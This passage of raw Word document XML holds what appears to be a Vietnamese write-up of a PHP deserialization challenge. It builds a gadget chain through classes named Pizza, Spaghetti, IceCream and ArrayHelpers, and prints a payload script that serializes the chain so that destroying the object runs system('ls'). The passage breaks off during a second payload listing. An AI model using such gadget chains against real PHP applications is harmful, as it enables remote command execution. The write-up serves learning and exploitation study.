          <w:p w14:paraId="0EB6C3E3" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">    $pizza-&gt;size = $spaghetti;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14858248" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E"/>
          <w:p w14:paraId="60E3BB14" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> serialize($pizza);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B8CCD94" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="565F71FA" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="00033063"/>
    <w:p w14:paraId="1B74AC05" w14:textId="5478A97B" w:rsidR="00BB5837" w:rsidRDefault="00BB5837" w:rsidP="00033063">
      <w:r>
        <w:t>Lưu payload vào file php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBF3CA4" w14:textId="09B8E863" w:rsidR="006E1E7E" w:rsidRDefault="00370626" w:rsidP="00033063">
      <w:r w:rsidRPr="00370626">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15B7C24F" wp14:editId="6247AD14">
            <wp:extent cx="5731510" cy="2268220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2041115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15980" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2268220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E65CE6" w14:textId="2E224C91" w:rsidR="00BB5837" w:rsidRDefault="00BB5837" w:rsidP="00033063">
      <w:r>
        <w:t>Khởi chạy file php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75588154" w14:textId="1B3B1C72" w:rsidR="00370626" w:rsidRDefault="00370626" w:rsidP="00033063">
      <w:r w:rsidRPr="00370626">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45BF091F" wp14:editId="5CC8DC37">
            <wp:extent cx="5731510" cy="1223645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15483822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82257" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1223645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52283C00" w14:textId="77777777" w:rsidR="000C210B" w:rsidRPr="000C210B" w:rsidRDefault="000C210B" w:rsidP="000C210B">
      <w:r w:rsidRPr="000C210B">
        <w:t xml:space="preserve">Có thông báo lỗi xảy ra </w:t>
      </w:r>
      <w:r w:rsidRPr="000C210B">
        <w:t xml:space="preserve">vì PHP không cho phép tuần tự hóa </w:t>
      </w:r>
      <w:r w:rsidRPr="000C210B">
        <w:t xml:space="preserve">Closure. </w:t>
      </w:r>
      <w:r w:rsidRPr="000C210B">
        <w:t>PHP không thể tuần tự hóa Closure vì nó không thể lưu trạng thái nội bộ của hàm ẩn danh, bao gồm phạm vi biến, ngữ cảnh, và các tham chiếu. Đây là một giới hạn bảo mật và kỹ thuật của PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CB70BA" w14:textId="74F882F8" w:rsidR="002B7B29" w:rsidRDefault="002B7B29" w:rsidP="00033063">
      <w:r w:rsidRPr="002B7B29">
        <w:t>Tuy nhiên, sau khi nghiên cứu, mình đã phát hiện một phần rất thú vị:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17738900" w14:textId="32C5A804" w:rsidR="00F124E1" w:rsidRDefault="00F124E1" w:rsidP="00033063">
      <w:r w:rsidRPr="00F124E1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D8ADF22" wp14:editId="603CD1DA">
            <wp:extent cx="5731510" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6709426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2666" name="Picture 1" descr="A black screen with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9E865A" w14:textId="77777777" w:rsidR="00FE308A" w:rsidRPr="00FE308A" w:rsidRDefault="00FE308A" w:rsidP="00FE308A">
      <w:r w:rsidRPr="00FE308A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75951DDB" w14:textId="77777777" w:rsidR="00FE308A" w:rsidRPr="00FE308A" w:rsidRDefault="00FE308A" w:rsidP="00FE308A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE308A">
        <w:t>Class này kế thừa ArrayIterator, nên có thể được khởi tạo với một mảng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A761CD" w14:textId="77777777" w:rsidR="00FE308A" w:rsidRPr="00FE308A" w:rsidRDefault="00FE308A" w:rsidP="00FE308A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE308A">
        <w:t>Hàm current() được override để gọi call_user_func($this-&gt;callback, $value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545FF06E" w14:textId="77777777" w:rsidR="00FE308A" w:rsidRPr="00FE308A" w:rsidRDefault="00FE308A" w:rsidP="00FE308A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE308A">
        <w:t>→ Nếu ta gán $callback = 'system' và mảng chứa 'ls', thì khi gọi $iterator-&gt;current(), nó sẽ thực thi system('ls').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CB672E" w14:textId="77777777" w:rsidR="002B7B29" w:rsidRDefault="002B7B29" w:rsidP="00033063"/>
    <w:p w14:paraId="174E8363" w14:textId="0769519E" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2F82">
        <w:t>ó thể nhúng đối tượng ArrayHelpers vào thuộc tính flavors của IceCream, rồi gọi IceCream() để kích hoạt __invoke(), từ đó gọi current() của ArrayHelpers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A131AAC" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002C2F82">
        <w:t>Ví dụ payload:</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2C2F82" w:rsidRPr="002C2F82" w14:paraId="76D72B5B" w14:textId="77777777" w:rsidTr="002C2F82">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="438405AC" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ADA676F" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67BEDFE5" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20A0347A" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D09EF75" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41342BC1" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="097F5333" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74A774F6" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="573EEC5D" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23FE9450" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="788C8372" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="419BAA12" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BD83F8C" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="020A8A85" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6970CDAE" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="278F835A" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>use Helpers\ArrayHelpers;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47AED6D5" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="197479A1" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>$exploit = new ArrayHelpers(['ls']);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="246ADD92" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>$exploit-&gt;callback = 'system';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32C2F9D7" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CF771BD" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>$iceCream = new IceCream();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD34830" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>$iceCream-&gt;flavors = $exploit;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33851BE6" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="148C24D1" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>$spaghetti = new Spaghetti();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F6D2CBB" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>$spaghetti-&gt;sauce = $iceCream;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A59F4B8" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="680E4189" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>$pizza = new Pizza();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F50701" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>$pizza-&gt;size = $spaghetti;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="241A69DC" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="245BF51D" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2F82">
              <w:t>echo serialize($pizza);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D00B49E" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BED9904" w14:textId="77777777" w:rsidR="002C2F82" w:rsidRPr="002C2F82" w:rsidRDefault="002C2F82" w:rsidP="002C2F82">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002C2F82">
        <w:t>→ Khi Pizza bị hủy, nó gọi $size-&gt;what → không tồn tại → gọi __get() → gọi $sauce() → chính là IceCream-&gt;__invoke() → gọi current() → thực thi system('ls').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FCE22B" w14:textId="28AED942" w:rsidR="002C2F82" w:rsidRDefault="00E04674" w:rsidP="00033063">
      <w:r>
        <w:t>Khởi tạo payload thực tế:</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E04674" w:rsidRPr="00E04674" w14:paraId="0CDDC172" w14:textId="77777777" w:rsidTr="00E04674">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="688D49EC" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00E04674">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F59D561" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045B9A45" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="493A0D1A" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53157596" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="794CDED8" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="150DFF21" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550155CD" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F4577E2" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1714EDD9" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:lastRenderedPageBreak/>
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18F56205" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18BE1889" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FBFF485" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1214675D" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33CE147B" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F48748" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56F68B67" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B4EDBBD" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B50BC06" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="534A0E44" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B12299B" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62D31685" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5713C5C8" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C975EDA" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="461E98D4" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ED9C95F" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="240EF883" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D607980" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29222162" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D676613" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22C3A698" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46DAD7D4" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>32</w:t>
            </w:r>
